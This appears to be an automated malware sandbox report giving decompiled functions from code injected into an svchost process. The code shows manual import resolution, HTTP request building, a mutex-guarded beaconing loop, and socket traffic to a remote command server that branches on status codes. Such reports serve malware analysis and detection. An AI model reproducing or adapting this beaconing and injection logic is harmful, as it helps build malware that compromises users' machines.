                    • Opcode Fuzzy Hash: d66088d6ec6cf0bdc646bf0f22455fa3914d869ef6e5d9bd59a7aee703ef0379
                    • Instruction Fuzzy Hash: 7A7147799002149FCB999F25DC84FAE7BA4EB4930AF14C07EE545D7221CB389E858B9C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 316 4c1a2f-4c1a44 317 4c1a4d-4c1a52 316->317 318 4c1a46-4c1a48 316->318 320 4c1a5b-4c1a65 317->320 321 4c1a54-4c1a56 317->321 319 4c1add-4c1ae0 318->319 322 4c1ad4-4c1ad8 320->322 321->319 323 4c1ada 322->323 324 4c1a67-4c1a7a LoadLibraryA 322->324 325 4c1adc 323->325 326 4c1a7c-4c1a80 324->326 327 4c1ae1-4c1ae3 324->327 325->319 328 4c1a8c-4c1a91 326->328 329 4c1a82-4c1a8a 326->329 327->325 330 4c1a93-4c1a97 328->330 329->330 331 4c1a99-4c1a9e 330->331 332 4c1ad1 330->332 333 4c1aa0 331->333 332->322 334 4c1aa7-4c1aaa 333->334 335 4c1aa2-4c1aa5 333->335 336 4c1aac-4c1ab8 GetProcAddress 334->336 335->336 336->327 337 4c1aba-4c1ac0 336->337 338 4c1ac5-4c1acf 337->338 339 4c1ac2 337->339 338->332 338->333 339->338
                    C-Code - Quality: 100%
                    			E004C1A2F(void* __ecx, intOrPtr _a4) {
                    				struct HINSTANCE__* _v8;
                    				intOrPtr _t19;
                    				struct HINSTANCE__* _t22;
                    				void* _t23;
                    				CHAR* _t24;
                    				CHAR* _t27;
                    				intOrPtr _t29;
                    				intOrPtr _t32;
                    				CHAR* _t35;
                    				signed short _t36;
                    				CHAR* _t37;
                    				struct HINSTANCE__* _t38;
                    				CHAR* _t42;
                    				intOrPtr _t44;
                    				CHAR* _t46;
                    
                    				_t32 = _a4;
                    				_t44 =  *((intOrPtr*)(_t32 + 0x3c));
                    				_t19 =  *((intOrPtr*)(_t44 + _t32 + 0x84));
                    				if(_t19 != 0) {
                    					__eflags = _t19 - 0xffff;
                    					if(_t19 <= 0xffff) {
                    						_t46 =  *((intOrPtr*)(_t44 + _t32 + 0x80)) + _t32;
                    						while(1) {
                    							__eflags = _t46[0xc];
                    							if(_t46[0xc] == 0) {
                    								break;
                    							}
                    							_t22 = LoadLibraryA(_t46[0xc] + _t32); // executed
                    							_t38 = _t22;
                    							_v8 = _t38;
                    							__eflags = _t38;
                    							if(_t38 == 0) {
                    								L23:
                    								_t23 = 0;
                    							} else {
                    								_t35 =  *_t46;
                    								__eflags = _t35;
                    								if(_t35 == 0) {
                    									_t42 = _t46[0x10] + _t32;
                    									__eflags = _t42;
                    									_t24 = _t42;
                    								} else {
                    									_t42 =  &(_t35[_t32]);
                    									_t24 = _t46[0x10] + _t32;
                    								}
                    								_t36 =  *_t42;
                    								__eflags = _t36;
                    								if(_t36 == 0) {
                    									L18:
                    									_t46 =  &(_t46[0x14]);
                    									__eflags = _t46;
                    									continue;
                    								} else {
                    									_a4 = _t24 - _t42;
                    									__eflags = _t36;
                    									L11:
                    									L11:
                    									if(__eflags >= 0) {
                    										_t27 = _t32 + 2 + _t36;
                    										__eflags = _t27;
                    									} else {
                    										_t27 = _t36 & 0x0000ffff;
                    									}
                    									_t37 = GetProcAddress(_t38, _t27);
                    									__eflags = _t37;
                    									if(_t37 == 0) {
                    										goto L23;
                    									}
                    									_t29 = _a4;
                    									__eflags = _t37 -  *(_t29 + _t42);
                    									if(_t37 !=  *(_t29 + _t42)) {
                    										 *(_t29 + _t42) = _t37;
                    									}
                    									_t38 = _v8;
                    									_t42 =  &(_t42[4]);
                    									_t36 =  *_t42;
                    									__eflags = _t36;
                    									if(__eflags != 0) {
                    										goto L11;
                    									} else {
                    										goto L18;
                    									}
                    								}
                    							}
                    							L21:
                    							goto L22;
                    						}
                    						_t23 = 1;
                    						goto L21;
                    					} else {
                    						_t23 = 0;
                    					}
                    				} else {
                    					_t23 = 1;
                    				}
                    				L22:
                    				return _t23;
                    			}


















                    0x004c1a34
                    0x004c1a38
                    0x004c1a3b
                    0x004c1a44
                    0x004c1a4d
                    0x004c1a52
                    0x004c1a63
                    0x004c1ad4
                    0x004c1ad4
                    0x004c1ad8
                    0x00000000
                    0x00000000
                    0x004c1a6d
                    0x004c1a73
                    0x004c1a75
                    0x004c1a78
                    0x004c1a7a
                    0x004c1ae1
                    0x004c1ae1
                    0x004c1a7c
                    0x004c1a7c
                    0x004c1a7e
                    0x004c1a80
                    0x004c1a8f
                    0x004c1a8f
                    0x004c1a91
                    0x004c1a82
                    0x004c1a85
                    0x004c1a88
                    0x004c1a88
                    0x004c1a93
                    0x004c1a95
                    0x004c1a97
                    0x004c1ad1
                    0x004c1ad1
                    0x004c1ad1
                    0x00000000
                    0x004c1a99
                    0x004c1a9b
                    0x004c1a9e
                    0x00000000
                    0x004c1aa0
                    0x004c1aa0
                    0x004c1aaa
                    0x004c1aaa
                    0x004c1aa2
                    0x004c1aa2
                    0x004c1aa2
                    0x004c1ab4
                    0x004c1ab6
                    0x004c1ab8
                    0x00000000
                    0x00000000
                    0x004c1aba
                    0x004c1abd
                    0x004c1ac0
                    0x004c1ac2
                    0x004c1ac2
                    0x004c1ac5
                    0x004c1ac8
                    0x004c1acb
                    0x004c1acd
                    0x004c1acf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004c1acf
                    0x004c1a97
                    0x004c1adc
                    0x00000000
                    0x004c1adc
                    0x004c1ada
                    0x00000000
                    0x004c1a54
                    0x004c1a54
                    0x004c1a54
                    0x004c1a46
                    0x004c1a46
                    0x004c1a46
                    0x004c1add
                    0x004c1ae0

                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8c6f51cbe7cca80b7d37a7f39fea7ea5545bc85ace7d9c8d27deb3ca999250fc
                    • Instruction ID: 71f53a2cae70dfe939900a3772b3df43a58e83f435b59b0ae1646aeaa4a467fb
                    • Opcode Fuzzy Hash: 8c6f51cbe7cca80b7d37a7f39fea7ea5545bc85ace7d9c8d27deb3ca999250fc
                    • Instruction Fuzzy Hash: 08218E396026029BDFA48E19C890F7773E5EF52308B28843ED846CB712D67AEC419B58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E004C300C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                    				void* _t8;
                    				intOrPtr _t11;
                    				intOrPtr _t12;
                    				void* _t13;
                    
                    				_t11 = _a16;
                    				_t13 = 0;
                    				_t12 = _a12;
                    				if(_t11 > 0) {
                    					_t12 =  <  ? _t11 : _t12;
                    				}
                    				while(1) {
                    					_push(0);
                    					_push(_t12 - _t13);
                    					_t8 = _a8 + _t13;
                    					_push(_t8);
                    					_push(_a4);
                    					L004C3764(); // executed
                    					if(_t8 <= 0) {
                    						break;
                    					}
                    					_t13 = _t13 + _t8;
                    					if(_t13 >= _t12 || _t11 <= 0) {
                    						return _t13;
                    					} else {
                    						continue;
                    					}
                    				}
                    				return 0;
                    			}







                    0x004c3010
                    0x004c3014
                    0x004c3017
                    0x004c301c
                    0x004c3020
                    0x004c3020
                    0x004c3023
                    0x004c3023
                    0x004c3029
                    0x004c302d
                    0x004c302f
                    0x004c3030
                    0x004c3033
                    0x004c303a
                    0x00000000
                    0x00000000
                    0x004c303c
                    0x004c3040
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004c3040
                    0x00000000

                    APIs
                    • recv.WS2_32(?,?,?,00000000), ref: 004C3033
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: recv
                    • String ID:
                    • API String ID: 1507349165-0
                    • Opcode ID: 3981c96398242f7698415b8ddeffde469fb1c2e697b263a90dc8c15a416a2368
                    • Instruction ID: 4bb79717aaa55e0d645812198c54884473ef40449fb8796acc0fcd5f3430d3f0
                    • Opcode Fuzzy Hash: 3981c96398242f7698415b8ddeffde469fb1c2e697b263a90dc8c15a416a2368
                    • Instruction Fuzzy Hash: 58F0E5773042282BEB609C6F9DC1F67BA9DEB94AA1F04803EFD08C3206D566DE0143D4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 82%
                    			E004C1095(CHAR* _a4, CHAR* _a8, CHAR* _a12) {
                    				char _v6;
                    				char _v8;
                    				char _v520;
                    				CHAR* _t56;
                    
                    				_t56 = _a4;
                    				_v8 = 0xa0d;
                    				_v6 = 0;
                    				 *_t56 = 0;
                    				lstrcatA(_t56, E004C3720("GET /",  &_v520));
                    				lstrcatA(_t56, _a12);
                    				lstrcatA(_t56, E004C3720(" HTTP/1.1\r\n",  &_v520));
                    				lstrcatA(_t56, E004C3720("Host: ",  &_v520));
                    				lstrcatA(_t56, _a8);
                    				lstrcatA(_t56,  &_v8);
                    				lstrcatA(_t56, E004C3720("User-Agent: ",  &_v520));
                    				_push( &_a4);
                    				_push( &_v520);
                    				_push(0);
                    				_a4 = 0x200;
                    				L004C37A0(); // executed
                    				lstrcatA(_t56,  &_v520);
                    				lstrcatA(_t56,  &_v8);
                    				lstrcatA(_t56, E004C3720("Accept: */*\r\n",  &_v520));
                    				lstrcatA(_t56,  &_v8);
                    				return 1;
                    			}







                    0x004c10a0
                    0x004c10af
                    0x004c10b5
                    0x004c10b9
                    0x004c10cb
                    0x004c10d1
                    0x004c10e8
                    0x004c10ff
                    0x004c1105
                    0x004c110c
                    0x004c1123
                    0x004c1128
                    0x004c112f
                    0x004c1130
                    0x004c1132
                    0x004c1139
                    0x004c1146
                    0x004c114d
                    0x004c1164
                    0x004c116b
                    0x004c1172

                    APIs
                      • Part of subcall function 004C3720: lstrcpyA.KERNEL32(?,?,?,004C212C,C:\,?,?,00000200,?,00000000,?,?,00000040), ref: 004C3729
                    • lstrcatA.KERNEL32(?,00000000), ref: 004C10CB
                    • lstrcatA.KERNEL32(?,?), ref: 004C10D1
                    • lstrcatA.KERNEL32(?,00000000), ref: 004C10E8
                    • lstrcatA.KERNEL32(?,00000000), ref: 004C10FF
                    • lstrcatA.KERNEL32(?,?), ref: 004C1105
                    • lstrcatA.KERNEL32(?,00000A0D), ref: 004C110C
                    • lstrcatA.KERNEL32(?,00000000), ref: 004C1123
                    • ObtainUserAgentString.URLMON(00000000,?,?), ref: 004C1139
                    • lstrcatA.KERNEL32(?,?), ref: 004C1146
                    • lstrcatA.KERNEL32(?,00000A0D), ref: 004C114D
                    • lstrcatA.KERNEL32(?,00000000), ref: 004C1164
                    • lstrcatA.KERNEL32(?,00000A0D), ref: 004C116B
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$AgentObtainStringUserlstrcpy
                    • String ID: HTTP/1.1$Accept: */*$GET /$Host: $User-Agent:
                    • API String ID: 3019601577-399457234
                    • Opcode ID: 6514c1b15c7c4dc135779eed561bfd81e5fdf5d3dbbd234d3b1dabfc500b41fe
                    • Instruction ID: c4f9227607625d7c943b66a076039e7d19e4671520734f5f68a368520bd8e5a7
                    • Opcode Fuzzy Hash: 6514c1b15c7c4dc135779eed561bfd81e5fdf5d3dbbd234d3b1dabfc500b41fe
                    • Instruction Fuzzy Hash: B8213EEA80421CBDE701AA90DD8AFFE7B7CDF81650F10805FF904D5041EA796B459AB5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 93%
                    			E004C234A() {
                    				char _v68;
                    				char _v100;
                    				char _v500;
                    				void* _t7;
                    				void* _t9;
                    				void* _t13;
                    				void* _t18;
                    				void* _t25;
                    				void* _t27;
                    				void* _t31;
                    				signed char _t37;
                    				void* _t45;
                    				struct _SECURITY_ATTRIBUTES* _t46;
                    				void* _t47;
                    				signed char _t52;
                    
                    				 *0x4c515c = 0;
                    				E004C1A2F(_t31, E004C1AE5()); // executed
                    				_t7 = E004C1F27(); // executed
                    				if(_t7 != 0) {
                    					L6:
                    					_push( &_v500);
                    					_push(0x202); // executed
                    					L004C3782(); // executed
                    					_t46 = 0;
                    					_t9 = E004C1BBD(0x927c0, 0x124f80);
                    					_t52 =  *0x4c515c; // 0x0
                    					 *0x4c5274 = 0;
                    					_t45 = _t9;
                    					if(_t52 != 0) {
                    						L13:
                    						L004C3788();
                    						CloseHandle( *0x4c5264);
                    						ExitProcess(0);
                    					} else {
                    						goto L7;
                    					}
                    					do {
                    						L7:
                    						_t53 = _t46;
                    						if(_t46 > 0) {
                    							goto L10;
                    						}
                    						_t18 = E004C25DA(_t53); // executed
                    						if(_t18 == 0) {
                    							goto L13;
                    						}
                    						_t46 = E004C1BBD( *0x4c5154,  *0x4c5158);
                    						L10:
                    						if(_t45 <= 0) {
                    							CloseHandle(CreateThread(0, 0, E004C206C, 0, 0, 0));
                    							_t45 = E004C1BBD(0x927c0, 0x124f80);
                    						}
                    						Sleep(0x1f4); // executed
                    						_t46 = _t46 - 0x1f4;
                    						_t45 = _t45 - 0x1f4; // executed
                    						E004C2512(1); // executed
                    						_t13 = 1;
                    						_t37 =  !=  ? _t13 :  *0x4c515c & 0x000000ff;
                    						 *0x4c515c = _t37;
                    					} while (_t37 == 0);
                    					goto L13;
                    				}
                    				_push("730c0a4976f1cf34");
                    				wsprintfA( &_v68, E004C3720("Global\\%sstp",  &_v100));
                    				_t25 = CreateMutexA(0, 0,  &_v68);
                    				 *0x4c5268 = _t25;
                    				_t47 = 0xa;
                    				while(E004C1F27() == 0) {
                    					_t27 = _t47;
                    					_t47 = _t47 - 1;
                    					__eflags = _t27;
                    					if(_t27 <= 0) {
                    						break;
                    					}
                    					Sleep(0x3e8);
                    				}
                    				E004C2512(2);
                    				goto L6;
                    			}


















                    0x004c2358
                    0x004c2364
                    0x004c236a
                    0x004c2371
                    0x004c23cf
                    0x004c23d5
                    0x004c23d6
                    0x004c23db
                    0x004c23ea
                    0x004c23ec
                    0x004c23f1
                    0x004c23f8
                    0x004c2405
                    0x004c2407
                    0x004c2494
                    0x004c2494
                    0x004c249f
                    0x004c24a3
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004c240d
                    0x004c240d
                    0x004c240d
                    0x004c240f
                    0x00000000
                    0x00000000
                    0x004c2411
                    0x004c2418
                    0x00000000
                    0x00000000
                    0x004c242d
                    0x004c242f
                    0x004c2431
                    0x004c2446
                    0x004c2459
                    0x004c2459
                    0x004c2460
                    0x004c246d
                    0x004c246f
                    0x004c2471
                    0x004c2482
                    0x004c2483
                    0x004c2486
                    0x004c248c
                    0x00000000
                    0x004c240d
                    0x004c2373
                    0x004c238d
                    0x004c239c
                    0x004c23a4
                    0x004c23a9
                    0x004c23be
                    0x004c23ac
                    0x004c23ae
                    0x004c23af
                    0x004c23b1
                    0x00000000
                    0x00000000
                    0x004c23b8
                    0x004c23b8
                    0x004c23c9
                    0x00000000

                    APIs
                      • Part of subcall function 004C1F27: wsprintfA.USER32 ref: 004C1F47
                      • Part of subcall function 004C1F27: CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 004C1F58
                      • Part of subcall function 004C1F27: GetLastError.KERNEL32 ref: 004C1F67
                      • Part of subcall function 004C1F27: CloseHandle.KERNEL32 ref: 004C1F7A
                    • wsprintfA.USER32 ref: 004C238D
                    • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 004C239C
                    • Sleep.KERNEL32(000003E8), ref: 004C23B8
                    • WSAStartup.WS2_32(00000202,?), ref: 004C23DB
                    • CreateThread.KERNEL32(00000000,00000000,004C206C,00000000,00000000,00000000), ref: 004C243F
                    • CloseHandle.KERNEL32(00000000), ref: 004C2446
                    • Sleep.KERNELBASE(000001F4), ref: 004C2460
                    • WSACleanup.WS2_32 ref: 004C2494
                    • CloseHandle.KERNEL32 ref: 004C249F
                    • ExitProcess.KERNEL32 ref: 004C24A3
                      • Part of subcall function 004C3720: lstrcpyA.KERNEL32(?,?,?,004C212C,C:\,?,?,00000200,?,00000000,?,?,00000040), ref: 004C3729
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateHandle$MutexSleepwsprintf$CleanupErrorExitLastProcessStartupThreadlstrcpy
                    • String ID: 730c0a4976f1cf34$Global\%sstp
                    • API String ID: 3688611787-1306516754
                    • Opcode ID: cf2bb79b183282623185fcff74f36be4e70c5b2333d831059f02aa3a97f3bb8e
                    • Instruction ID: 1342c39a287135024442e3b6a3258e7e2bb4d19dcd17d35cb12e7f40c6f85ffb
                    • Opcode Fuzzy Hash: cf2bb79b183282623185fcff74f36be4e70c5b2333d831059f02aa3a97f3bb8e
                    • Instruction Fuzzy Hash: 0431E27A584350BBE7806BB66E4AF7E37989B01748F04016FF900D72A3DEEC5C444A6C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 108 4c1234-4c1254 call 4c1000 111 4c125e-4c127f call 4c1d41 call 4c1095 108->111 112 4c1256-4c1259 108->112 118 4c147a-4c147b closesocket 111->118 119 4c1285-4c12a4 lstrlenA * 2 send 111->119 113 4c148b-4c148e 112->113 120 4c1481-4c148a call 4c1d2d 118->120 121 4c12aa-4c12e1 select 119->121 122 4c1474 119->122 120->113 121->118 125 4c12e7-4c12fb recv 121->125 123 4c1477 122->123 123->118 127 4c12fd-4c1302 125->127 128 4c134b 125->128 130 4c130e-4c1310 127->130 131 4c1304-4c130c 127->131 129 4c134d-4c134f 128->129 129->123 132 4c1355-4c1365 call 4c1d0f 129->132 130->129 133 4c1312-4c1344 select 130->133 131->129 131->130 132->123 137 4c136b 132->137 133->125 135 4c1346 133->135 135->123 138 4c136e-4c1371 137->138 139 4c136d 138->139 140 4c1373-4c1382 call 4c1ce7 138->140 139->138 143 4c13de-4c13fc call 4c3720 StrStrA 140->143 144 4c1384-4c138a 140->144 150 4c13fe-4c1412 call 4c1d0f 143->150 151 4c1437-4c143d 143->151 146 4c138c-4c138f 144->146 147 4c1394-4c139a 144->147 146->118 147->143 149 4c139c-4c13a2 147->149 149->143 152 4c13a4-4c13a8 149->152 169 4c1434 150->169 170 4c1414 150->170 153 4c145e-4c1463 call 4c343f 151->153 154 4c143f-4c1441 151->154 156 4c13aa-4c13ac 152->156 157 4c13b1-4c13c3 call 4c148f 152->157 171 4c1468-4c1469 153->171 160 4c1452-4c145c call 4c17a0 154->160 161 4c1443-4c1444 154->161 158 4c146e-4c1470 156->158 157->123 172 4c13c9-4c13d9 call 4c15f3 157->172 158->120 164 4c1472 158->164 160->171 166 4c146a-4c146c 161->166 167 4c1446-4c1450 call 4c16e4 161->167 164->118 166->158 167->171 169->151 175 4c1417-4c141a 170->175 171->166 172->158 178 4c141c-4c142f call 4c1d51 175->178 179 4c1416 175->179 178->169 179->175
                    C-Code - Quality: 67%
                    			E004C1234(void* __edx, CHAR* _a4, CHAR* _a8, char _a12) {
                    				signed int _v8;
                    				CHAR* _v12;
                    				intOrPtr _v16;
                    				char _v20;
                    				char _v52;
                    				char _v84;
                    				signed int _v340;
                    				char _v344;
                    				void* _t39;
                    				signed int _t40;
                    				signed int _t42;
                    				int _t45;
                    				int _t46;
                    				signed int _t48;
                    				signed int _t50;
                    				signed int _t51;
                    				signed int _t55;
                    				signed int _t67;
                    				signed int _t70;
                    				void* _t71;
                    				signed int _t72;
                    				void* _t87;
                    				char* _t89;
                    				signed int _t92;
                    				signed int _t93;
                    				signed int _t94;
                    				signed int _t96;
                    				signed int _t97;
                    				signed int _t98;
                    				signed int _t100;
                    				void* _t102;
                    
                    				_t87 = __edx;
                    				_t94 = 0;
                    				_v8 = 0;
                    				_t40 = E004C1000(_t39, _a4, 0x50); // executed
                    				_t72 = _t40;
                    				if(_t72 > 0) {
                    					_t89 = E004C1D41(0x800);
                    					_v12 = _t89;
                    					_t42 = E004C1095(_t89, _a4, _a8); // executed
                    					__eflags = _t42;
                    					if(_t42 == 0) {
                    						L45:
                    						__imp__#3(_t72);
                    						L46:
                    						E004C1D2D(_t89);
                    						return _t94;
                    					}
                    					_t45 = lstrlenA(_t89);
                    					_t46 = lstrlenA(_v12);
                    					__imp__#19(_t72, _v12, _t46, 0); // executed
                    					__eflags = _t46 - _t45;
                    					if(_t46 != _t45) {
                    						_t89 = _v12;
                    						L44:
                    						_t94 = _v8;
                    						goto L45;
                    					}
                    					_t48 =  &_v344;
                    					_t94 = 0;
                    					_v344 = 1;
                    					_v340 = _t72;
                    					_v20 = 0;
                    					_v16 = 0x3938700;
                    					__imp__#18(0, _t48, 0, 0,  &_v20); // executed
                    					_t89 = _v12;
                    					__eflags = _t48;
                    					if(_t48 <= 0) {
                    						goto L45;
                    					} else {
                    						goto L5;
                    					}
                    					while(1) {
                    						L5:
                    						_t50 = 0x800 - _t94;
                    						__imp__#16(_t72, _t89, 0x800, 0); // executed
                    						__eflags = 0x800;
                    						if(0x800 < 0) {
                    							break;
                    						}
                    						_t96 = _t94 + 0x800;
                    						__eflags = _t96 - 4;
                    						if(_t96 <= 4) {
                    							L8:
                    							__eflags = _t50;
                    							if(_t50 == 0) {
                    								L12:
                    								__eflags = _t96;
                    								if(_t96 <= 0) {
                    									goto L44;
                    								}
                    								_t89[_t96] = 0;
                    								_t51 = E004C1D0F(_t89, 0x20);
                    								__eflags = _t51;
                    								if(_t51 == 0) {
                    									goto L44;
                    								}
                    								while(1) {
                    									__eflags =  *_t51 - 0x20;
                    									if( *_t51 != 0x20) {
                    										break;
                    									}
                    									_t51 = _t51 + 1;
                    									__eflags = _t51;
                    								}
                    								_t97 = E004C1CE7(_t51);
                    								__eflags = _t97 - 0xc8;
                    								if(_t97 == 0xc8) {
                    									L26:
                    									_v52 = 0;
                    									_t55 = StrStrA(_t89, E004C3720("Date:",  &_v84));
                    									__eflags = _t55;
                    									if(_t55 == 0) {
                    										L33:
                    										_t98 = _t97 - 0xc8;
                    										__eflags = _t98;
                    										if(_t98 == 0) {
                    											E004C343F(_t72,  &_v52); // executed
                    											L39:
                    											L40:
                    											_t94 = 0;
                    											_t72 = 0;
                    											__eflags = 0;
                    											L41:
                    											__eflags = _t94;
                    											if(_t94 > 0) {
                    												goto L46;
                    											}
                    											goto L45;
                    										}
                    										_t100 = _t98;
                    										__eflags = _t100;
                    										if(_t100 == 0) {
                    											E004C17A0(_t87, _t72,  &_v52);
                    											goto L39;
                    										}
                    										__eflags = _t100 - 1;
                    										if(__eflags != 0) {
                    											goto L40;
                    										}
                    										E004C16E4(_t87, __eflags, _t72,  &_v52);
                    										goto L39;
                    									}
                    									_v8 = _t55 + 6;
                    									_t92 = E004C1D0F(_t55 + 6, 0xd);
                    									__eflags = _t92;
                    									if(_t92 == 0) {
                    										L32:
                    										_t89 = _v12;
                    										goto L33;
                    									}
                    									while(1) {
                    										__eflags =  *_t92 - 0x20;
                    										if( *_t92 == 0x20) {
                    											break;
                    										}
                    										_t92 = _t92 - 1;
                    										__eflags = _t92;
                    									}
                    									_t93 = _t92 - _v8;
                    									__eflags = _t93;
                    									E004C1D51( &_v52, _v8, _t93);
                    									 *((char*)(_t102 + _t93 - 0x30)) = 0;
                    									goto L32;
                    								}
                    								__eflags = _t97 - 0x1f7;
                    								if(_t97 != 0x1f7) {
                    									__eflags = _t97 - 0xca;
                    									if(_t97 == 0xca) {
                    										goto L26;
                    									}
                    									__eflags = _t97 - 0xcb;
                    									if(_t97 == 0xcb) {
                    										goto L26;
                    									}
                    									__eflags = _a12;
                    									if(_a12 == 0) {
                    										_t67 = E004C148F(_t72, 0x4c5280, 1);
                    										__eflags = _t67;
                    										if(_t67 == 0) {
                    											goto L44;
                    										}
                    										E004C15F3(_t72, 0, 3);
                    										_t94 = _v8;
                    										goto L41;
                    									}
                    									_t94 = _t72;
                    									goto L41;
                    								}
                    								_t94 = _t97 | 0xffffffff;
                    								goto L45;
                    							}
                    							_t70 =  &_v344;
                    							_v344 = 1;
                    							_v340 = _t72;
                    							_v20 = 0;
                    							_v16 = 0x3938700;
                    							__imp__#18(0, _t70, 0, 0,  &_v20);
                    							__eflags = _t70;
                    							if(_t70 > 0) {
                    								continue;
                    							}
                    							goto L44;
                    						}
                    						__eflags =  *((intOrPtr*)(_t96 + _t89 - 4)) - 0xa0d0a0d;
                    						if( *((intOrPtr*)(_t96 + _t89 - 4)) == 0xa0d0a0d) {
                    							goto L12;
                    						}
                    						goto L8;
                    					}
                    					_t96 = 0;
                    					__eflags = 0;
                    					goto L12;
                    				}
                    				_t71 = 0xffffff9c;
                    				return _t71;
                    			}


































                    0x004c1234
                    0x004c1244
                    0x004c1246
                    0x004c1249
                    0x004c124e
                    0x004c1254
                    0x004c126c
                    0x004c1271
                    0x004c1275
                    0x004c127d
                    0x004c127f
                    0x004c147a
                    0x004c147b
                    0x004c1481
                    0x004c1482
                    0x00000000
                    0x004c148a
                    0x004c128c
                    0x004c1295
                    0x004c129c
                    0x004c12a2
                    0x004c12a4
                    0x004c1474
                    0x004c1477
                    0x004c1477
                    0x00000000
                    0x004c1477
                    0x004c12b2
                    0x004c12ba
                    0x004c12bc
                    0x004c12c6
                    0x004c12cc
                    0x004c12cf
                    0x004c12d6
                    0x004c12dc
                    0x004c12df
                    0x004c12e1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004c12e7
                    0x004c12e7
                    0x004c12ee
                    0x004c12f3
                    0x004c12f9
                    0x004c12fb
                    0x00000000
                    0x00000000
                    0x004c12fd
                    0x004c12ff
                    0x004c1302
                    0x004c130e
                    0x004c130e
                    0x004c1310
                    0x004c134d
                    0x004c134d
                    0x004c134f
                    0x00000000
                    0x00000000
                    0x004c1358
                    0x004c135c
                    0x004c1363
                    0x004c1365
                    0x00000000
                    0x00000000
                    0x004c136e
                    0x004c136e
                    0x004c1371
                    0x00000000
                    0x00000000
                    0x004c136d
                    0x004c136d
                    0x004c136d
                    0x004c1379
                    0x004c137c
                    0x004c1382
                    0x004c13de
                    0x004c13e7
                    0x004c13f4
                    0x004c13fa
                    0x004c13fc
                    0x004c1437
                    0x004c1437
                    0x004c1437
                    0x004c143d
                    0x004c1463
                    0x004c1468
                    0x004c146a
                    0x004c146a
                    0x004c146c
                    0x004c146c
                    0x004c146e
                    0x004c146e
                    0x004c1470
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004c1472
                    0x004c1440
                    0x004c1440
                    0x004c1441
                    0x004c1457
                    0x00000000
                    0x004c1457
                    0x004c1443
                    0x004c1444
                    0x00000000
                    0x00000000
                    0x004c144b
                    0x00000000
                    0x004c144b
                    0x004c1404
                    0x004c140c
                    0x004c1410
                    0x004c1412
                    0x004c1434
                    0x004c1434
                    0x00000000
                    0x004c1434
                    0x004c1417
                    0x004c1417
                    0x004c141a
                    0x00000000
                    0x00000000
                    0x004c1416
                    0x004c1416
                    0x004c1416
                    0x004c141f
                    0x004c141f
                    0x004c1427
                    0x004c142f
                    0x00000000
                    0x004c142f
                    0x004c1384
                    0x004c138a
                    0x004c1394
                    0x004c139a
                    0x00000000
                    0x00000000
                    0x004c139c
                    0x004c13a2
                    0x00000000
                    0x00000000
                    0x004c13a4
                    0x004c13a8
                    0x004c13b9
                    0x004c13c1
                    0x004c13c3
                    0x00000000
                    0x00000000
                    0x004c13ce
                    0x004c13d3
                    0x00000000
                    0x004c13d6
                    0x004c13aa
                    0x00000000
                    0x004c13aa
                    0x004c138c
                    0x00000000
                    0x004c138c
                    0x004c131a
                    0x004c1322
                    0x004c132c
                    0x004c1332
                    0x004c1335
                    0x004c133c
                    0x004c1342
                    0x004c1344
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004c1346
                    0x004c1304
                    0x004c130c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004c130c
                    0x004c134b
                    0x004c134b
                    0x00000000
                    0x004c134b
                    0x004c1258
                    0x00000000

                    APIs
                      • Part of subcall function 004C1000: gethostbyname.WS2_32(?), ref: 004C1009
                    • lstrlenA.KERNEL32(00000000), ref: 004C128C
                    • lstrlenA.KERNEL32(?,00000000), ref: 004C1295
                    • send.WS2_32(00000000,?,00000000), ref: 004C129C
                    • select.WS2_32(00000000,?,00000000,00000000,?), ref: 004C12D6
                    • recv.WS2_32(00000000,?,00000800,00000000), ref: 004C12F3
                    • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 004C133C
                    • closesocket.WS2_32(00000000), ref: 004C147B
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlenselect$closesocketgethostbynamerecvsend
                    • String ID: Date:
                    • API String ID: 1023185212-1706368814
                    • Opcode ID: d4c7e9dea616001f0791a9ad0e20f2fc90fd2169edebe345075cae1d4de062f5
